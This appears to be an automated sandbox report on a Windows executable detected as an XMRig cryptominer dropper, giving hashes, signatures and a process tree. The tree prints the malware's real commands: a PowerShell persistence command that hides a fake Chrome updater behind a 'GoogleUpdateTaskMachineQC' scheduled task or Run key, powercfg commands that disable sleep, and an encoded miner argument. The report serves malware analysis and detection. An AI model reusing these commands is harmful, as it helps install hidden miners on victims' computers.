Analysis

  • max time kernel
    300s
  • max time network
    296s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/01/2023, 05:36

General

  • Target

    monly.exe

  • Size

    2.0MB

  • MD5

    50591643463aa061f6a1093c224685ad

  • SHA1

    8647dad50e4fe4cc5a5908cfad55a214536b59fa

  • SHA256

    7981b6a4a0f64eae7f318771206be555f703e58e094170fdc1e0f561fb961f69

  • SHA512

    164f909f16065e46dabee2f1d59db5036903778aedf2ed78841dcec38b3fdbafd39fc5b3c7f9089aba0815baf20b8a89abf374a05162ab47fb572ed0b4908f9b

  • SSDEEP

    49152:nDLC8ycrPTN6kydQIaWCZgZK/3nXbemOIYVzZG6qpdy709Ym+o:n68ycvN/6dU3XMVzZHqpsAYm+o

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of SetThreadContext 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3048
      • C:\Users\Admin\AppData\Local\Temp\monly.exe
        "C:\Users\Admin\AppData\Local\Temp\monly.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:4944
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3372
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:204
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4080
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1644
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vpzjefdr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1868
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#imewl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3312
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:2884
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3104
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:4048
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:4564
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:3580
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:1552
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vpzjefdr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2872
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe vrcccnqi
                  2⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Suspicious behavior: EnumeratesProcesses
                  PID:824
                • C:\Windows\System32\cmd.exe
                  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4432
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic PATH Win32_VideoController GET Name, VideoProcessor
                    3⤵
                      PID:4232
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
                    2⤵
                      PID:3588
                    • C:\Windows\System32\notepad.exe
                      C:\Windows\System32\notepad.exe amlutehkvrexxnan 6E3sjfZq2rJQaxvLPmXgsF8m0bydKza2y5kqAUGcbpao/0Ot8N4z1S2zUsf2CmEzagE3EoWzRxynpgqx+IdZeyRsQLKxHp2bKyQXrUSafgp6v8OMiAaCPQVvAhiX00lmhopIy68BKcw3eTBQdbhXcWRQJl6kXYk0RzxSzbvaop4IZYxrzOKPiujusKtpZDaGwuSSrLUl37OhLbWqW8JxkjGYR7xNSCeomuHAHI0WC/87tApA7wraT03QKHAigScCH223uz2H1ZJm98DbzRrFHvV+snKfqtZBxeQcnBAddAZ1QHrWW6900PC8Vie7AqPFEAWND1ScyDlrqjgfIplSfAjIEJyAvbgcblscWs8ggtg9bGDUX0iYbjuOw/9SZeK8/gzphmUHQFaDoZJZwgc3RxP5XmucG9fn3OsiU/MupoyqErVH6OGFYpBPSGlhCxFwXkytz08QlUWIbZnHUgCPJ6CUTsQT3e8DR8tqCIKQzvzShnXxx+WXrq+HjxoKcQGtVIC8XrTj8W/y8rxGD9cpS1msl+wFICDkwtObijOKQnRu+eLSXx0IQgdJYV635eIFw2mEQVgkbBxc7gQ0bNbNQEM4YjrunN2Afh3Dd1gPaNLzv2i2ccNquC85tdrGUEcAiqRsKHcuI9cxqIeRBtWqGYNpftfNJoXa13tHQYzoXNna/mZQT0tbK3qOHKSKg6jN4nWMcvamRU5Wd3UXsXTdWghezKbvQw0FC3Mks88wZZI=
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:900
                  • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                    C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                    1⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:1460

                  Network

                        MITRE ATT&CK Matrix

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          3KB

                          MD5

                          00e7da020005370a518c26d5deb40691

                          SHA1

                          389b34fdb01997f1de74a5a2be0ff656280c0432

                          SHA256

                          a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

                          SHA512

                          9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          d2b54d43c47c01c84648072eff87488d

                          SHA1

                          e3569422679f4196c0ea8b4066402471cc0bc6c8

                          SHA256

                          9c6fd9ad1101973dbe2776d9135c7760f86a4a71790fa1845c108ebc8f3b1c85

                          SHA512

                          e8e29c236de39297e06f4dc78b7ba7dd841d7603155d8ad6a611c72d1dca354eb6ea2ae1ca5d82eeea01cf21da54b921c7c21c12845265e2256a43f2e3416179

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          055cd1930e45c3d77aa744d53bcc29d9

                          SHA1

                          af1464daf329f36930b71fb33119c61a13472b6d

                          SHA256

                          fcd4a469c653f6bd319b201326633c2183a70184bc159c071915a9c4abd92d3c

                          SHA512

                          00ee038f281f34c7d727b7d6d7734bdfc61ee742b33edc5f905adae6afa949b9a9da8c575d949e98b24b59005e469628e99f113e0fc612dc24bbba7f098fa65d

                        • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

                          Filesize

                          2.0MB

                          MD5

                          50591643463aa061f6a1093c224685ad

                          SHA1

                          8647dad50e4fe4cc5a5908cfad55a214536b59fa

                          SHA256

                          7981b6a4a0f64eae7f318771206be555f703e58e094170fdc1e0f561fb961f69

                          SHA512

                          164f909f16065e46dabee2f1d59db5036903778aedf2ed78841dcec38b3fdbafd39fc5b3c7f9089aba0815baf20b8a89abf374a05162ab47fb572ed0b4908f9b

                        • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

                          Filesize

                          2.0MB

                          MD5

                          50591643463aa061f6a1093c224685ad

                          SHA1

                          8647dad50e4fe4cc5a5908cfad55a214536b59fa

                          SHA256

                          7981b6a4a0f64eae7f318771206be555f703e58e094170fdc1e0f561fb961f69

                          SHA512

                          164f909f16065e46dabee2f1d59db5036903778aedf2ed78841dcec38b3fdbafd39fc5b3c7f9089aba0815baf20b8a89abf374a05162ab47fb572ed0b4908f9b

                        • C:\Users\Admin\AppData\Roaming\Google\Libs\g.log

                          Filesize

                          226B

                          MD5

                          fdba80d4081c28c65e32fff246dc46cb

                          SHA1

                          74f809dedd1fc46a3a63ac9904c80f0b817b3686

                          SHA256

                          b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                          SHA512

                          b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

                        • memory/900-161-0x0000020FA2110000-0x0000020FA2130000-memory.dmp

                          Filesize

                          128KB

                        • memory/900-162-0x0000020FA2110000-0x0000020FA2130000-memory.dmp

                          Filesize

                          128KB

                        • memory/900-160-0x00007FF658200000-0x00007FF6589F4000-memory.dmp

                          Filesize

                          8.0MB

                        • memory/900-159-0x0000020F0DF50000-0x0000020F0DF90000-memory.dmp

                          Filesize

                          256KB

                        • memory/900-155-0x0000020F0DF00000-0x0000020F0DF20000-memory.dmp

                          Filesize

                          128KB

                        • memory/900-158-0x00007FF658200000-0x00007FF6589F4000-memory.dmp

                          Filesize

                          8.0MB

                        • memory/1868-138-0x00007FFB85510000-0x00007FFB85FD1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/1868-137-0x00007FFB85510000-0x00007FFB85FD1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/1868-133-0x000001C22FF20000-0x000001C22FF42000-memory.dmp

                          Filesize

                          136KB

                        • memory/2872-151-0x00007FFB85510000-0x00007FFB85FD1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2872-150-0x00007FFB85510000-0x00007FFB85FD1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3312-144-0x00007FFB85510000-0x00007FFB85FD1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3312-140-0x00007FFB85510000-0x00007FFB85FD1000-memory.dmp

                          Filesize

                          10.8MB